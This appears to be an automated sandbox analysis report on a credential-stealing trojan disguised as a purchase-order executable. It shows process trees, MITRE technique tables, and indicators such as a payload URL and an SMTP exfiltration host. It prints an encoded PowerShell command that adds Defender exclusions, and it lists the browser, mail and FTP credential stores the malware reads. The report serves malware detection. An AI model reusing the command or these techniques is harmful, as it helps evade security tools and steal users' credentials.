                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEQAZQBzAGsAdABvAHAAXABwAHUAcgBjAGgAYQBzAGUAIABvAHIAZABlAHIAIABUACYAQgAxADkALQAyADAAUABPADEAMgA4AC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABEAGUAcwBrAHQAbwBwAFwAcAB1AHIAYwBoAGEAcwBlACAAbwByAGQAZQByACAAVAAmAEIAMQA5AC0AMgAwAFAATwAxADIAOAAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAbwBmAGcALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAbwBmAGcALgBlAHgAZQA=Jump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renewJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /releaseJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renewJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\ofg.exe "C:\Users\user\AppData\Roaming\ofg.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /releaseJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renewJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcagoabwbuaguacwbcaeqazqbzagsadabvahaaxabwahuacgbjaggayqbzaguaiabvahiazablahiaiabuacyaqgaxadkalqayadaauabpadeamga4ac4azqb4aguaowagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaacgbvagmazqbzahmaiabdadoaxabvahmazqbyahmaxabqag8abgblahmaxabeaguacwbrahqabwbwafwacab1ahiaywboageacwblacaabwbyagqazqbyacaavaamaeiamqa5ac0amgawafaatwaxadiaoaauaguaeabladsaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcagoabwbuaguacwbcaeeacabwaeqayqb0ageaxabsag8ayqbtagkabgbnafwabwbmagcalgblahgazqa7acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabyag8aywblahmacwagaemaogbcafuacwblahiacwbcagoabwbuaguacwbcaeeacabwaeqayqb0ageaxabsag8ayqbtagkabgbnafwabwbmagcalgblahgazqa=
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcagoabwbuaguacwbcaeqazqbzagsadabvahaaxabwahuacgbjaggayqbzaguaiabvahiazablahiaiabuacyaqgaxadkalqayadaauabpadeamga4ac4azqb4aguaowagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaacgbvagmazqbzahmaiabdadoaxabvahmazqbyahmaxabqag8abgblahmaxabeaguacwbrahqabwbwafwacab1ahiaywboageacwblacaabwbyagqazqbyacaavaamaeiamqa5ac0amgawafaatwaxadiaoaauaguaeabladsaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcagoabwbuaguacwbcaeeacabwaeqayqb0ageaxabsag8ayqbtagkabgbnafwabwbmagcalgblahgazqa7acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabyag8aywblahmacwagaemaogbcafuacwblahiacwbcagoabwbuaguacwbcaeeacabwaeqayqb0ageaxabsag8ayqbtagkabgbnafwabwbmagcalgblahgazqa=Jump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeQueries volume information: C:\Users\user\Desktop\purchase order T&B19-20PO128.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeQueries volume information: C:\Users\user\AppData\Roaming\ofg.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 0.2.purchase order T&B19-20PO128.exe.3519550.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.purchase order T&B19-20PO128.exe.3519550.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.ofg.exe.3e418f0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.ofg.exe.3e418f0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1398770544.0000000003518000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2387668752.0000000002E3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.1643604191.00000000038BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1577207374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.1643604191.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1398770544.000000000359A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1580815664.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2387668752.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1580815664.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: purchase order T&B19-20PO128.exe PID: 8136, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2072, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ofg.exe PID: 3932, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 756, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\FTP Navigator\Ftplist.txt
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 0.2.purchase order T&B19-20PO128.exe.3519550.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.purchase order T&B19-20PO128.exe.3519550.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.ofg.exe.3e418f0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.ofg.exe.3e418f0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1398770544.0000000003518000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.1643604191.00000000038BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1577207374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.1643604191.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1398770544.000000000359A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2387668752.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1580815664.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: purchase order T&B19-20PO128.exe PID: 8136, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2072, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ofg.exe PID: 3932, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 756, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 0.2.purchase order T&B19-20PO128.exe.3519550.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.purchase order T&B19-20PO128.exe.3519550.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.ofg.exe.3e418f0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.ofg.exe.3e418f0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1398770544.0000000003518000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2387668752.0000000002E3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.1643604191.00000000038BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1577207374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.1643604191.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1398770544.000000000359A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1580815664.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2387668752.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1580815664.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: purchase order T&B19-20PO128.exe PID: 8136, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2072, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ofg.exe PID: 3932, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 756, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information111
                      Scripting
                      Valid Accounts121
                      Windows Management Instrumentation
                      111
                      Scripting
                      1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      2
                      OS Credential Dumping
                      2
                      File and Directory Discovery
                      Remote Services11
                      Archive Collected Data
                      1
                      Ingress Tool Transfer
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Command and Scripting Interpreter
                      1
                      DLL Side-Loading
                      211
                      Process Injection
                      11
                      Deobfuscate/Decode Files or Information
                      1
                      Input Capture
                      24
                      System Information Discovery
                      Remote Desktop Protocol2
                      Data from Local System
                      1
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Scheduled Task/Job
                      1
                      Scheduled Task/Job
                      1
                      Scheduled Task/Job
                      2
                      Obfuscated Files or Information
                      1
                      Credentials in Registry
                      311
                      Security Software Discovery
                      SMB/Windows Admin Shares1
                      Email Collection
                      2
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts1
                      PowerShell
                      2
                      Registry Run Keys / Startup Folder
                      2
                      Registry Run Keys / Startup Folder
                      1
                      Software Packing
                      NTDS1
                      Process Discovery
                      Distributed Component Object Model1
                      Input Capture
                      12
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading
                      LSA Secrets141
                      Virtualization/Sandbox Evasion
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading
                      Cached Domain Credentials1
                      Application Window Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                      Virtualization/Sandbox Evasion
                      DCSync1
                      System Network Configuration Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job211
                      Process Injection
                      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1637288 Sample: purchase order T&B19-20PO128.exe Startdate: 13/03/2025 Architecture: WINDOWS Score: 100 61 mail.iaa-airferight.com 2->61 81 Found malware configuration 2->81 83 Malicious sample detected (through community Yara rule) 2->83 85 Antivirus / Scanner detection for submitted sample 2->85 87 16 other signatures 2->87 9 purchase order T&B19-20PO128.exe 15 6 2->9         started        14 wscript.exe 1 2->14         started        signatures3 process4 dnsIp5 63 196.251.83.222, 49720, 51695, 80 SONIC-WirelessZA Seychelles 9->63 53 C:\Users\user\AppData\Roaming\ofg.exe, PE32 9->53 dropped 55 C:\Users\user\...\ofg.exe:Zone.Identifier, ASCII 9->55 dropped 57 C:\Users\user\AppData\Roaming\...\ofg.vbs, ASCII 9->57 dropped 97 Encrypted powershell cmdline option found 9->97 99 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->99 101 Writes to foreign memory regions 9->101 103 Injects a PE file into a foreign processes 9->103 16 InstallUtil.exe 2 9->16         started        20 cmd.exe 1 9->20         started        22 cmd.exe 1 9->22         started        24 powershell.exe 7 9->24         started        105 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->105 26 ofg.exe 14 3 14->26         started        file6 signatures7 process8 dnsIp9 59 mail.iaa-airferight.com 46.175.148.58, 25 ASLAGIDKOM-NETUA Ukraine 16->59 65 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 16->65 67 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 16->67 69 Tries to steal Mail credentials (via file / registry access) 16->69 71 Uses ipconfig to lookup or modify the Windows network settings 20->71 28 conhost.exe 20->28         started        30 ipconfig.exe 1 20->30         started        32 conhost.exe 22->32         started        34 ipconfig.exe 1 22->34         started        36 conhost.exe 24->36         started        73 Antivirus detection for dropped file 26->73 75 Multi AV Scanner detection for dropped file 26->75 77 Writes to foreign memory regions 26->77 79 Injects a PE file into a foreign processes 26->79 38 InstallUtil.exe 26->38         started        41 cmd.exe 26->41         started        43 cmd.exe 26->43         started        signatures10 process11 signatures12 89 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 38->89 91 Tries to steal Mail credentials (via file / registry access) 38->91 93 Tries to harvest and steal ftp login credentials 38->93 95 Tries to harvest and steal browser information (history, passwords, etc) 38->95 45 conhost.exe 41->45         started        47 ipconfig.exe 41->47         started        49 conhost.exe 43->49         started        51 ipconfig.exe 43->51         started        process13

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      purchase order T&B19-20PO128.exe44%VirustotalBrowse
                      purchase order T&B19-20PO128.exe29%ReversingLabsWin32.Trojan.Genie8DN
                      purchase order T&B19-20PO128.exe100%AviraTR/Kryptik.jlnse
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\ofg.exe100%AviraTR/Kryptik.jlnse
                      C:\Users\user\AppData\Roaming\ofg.exe29%ReversingLabsWin32.Trojan.Genie8DN
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://196.251.83.222/win32/panel/uploads/Xqmvapt.wav/Invalid0%Avira URL Cloudsafe
                      http://196.251.83.222/win32/panel/uploads/Xqmvapt.wav0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      mail.iaa-airferight.com
                      46.175.148.58
                      truefalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://196.251.83.222/win32/panel/uploads/Xqmvapt.wavfalse
                        • Avira URL Cloud: safe
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://github.com/mgravell/protobuf-netipurchase order T&B19-20PO128.exe, 00000000.00000002.1407669787.0000000005A38000.00000004.08000000.00040000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.000000000387D000.00000004.00000800.00020000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, ofg.exe, 00000012.00000002.1643604191.0000000003829000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://stackoverflow.com/q/14436606/23354purchase order T&B19-20PO128.exe, 00000000.00000002.1407669787.0000000005A38000.00000004.08000000.00040000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1390243265.000000000253F000.00000004.00000800.00020000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.000000000387D000.00000004.00000800.00020000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, ofg.exe, 00000012.00000002.1630701486.00000000027CF000.00000004.00000800.00020000.00000000.sdmp, ofg.exe, 00000012.00000002.1643604191.0000000003829000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://account.dyn.com/purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.0000000003518000.00000004.00000800.00020000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.000000000359A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.1577207374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, ofg.exe, 00000012.00000002.1643604191.00000000038BC000.00000004.00000800.00020000.00000000.sdmp, ofg.exe, 00000012.00000002.1643604191.0000000003E41000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://github.com/mgravell/protobuf-netJpurchase order T&B19-20PO128.exe, 00000000.00000002.1407669787.0000000005A38000.00000004.08000000.00040000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.000000000387D000.00000004.00000800.00020000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, ofg.exe, 00000012.00000002.1643604191.0000000003829000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
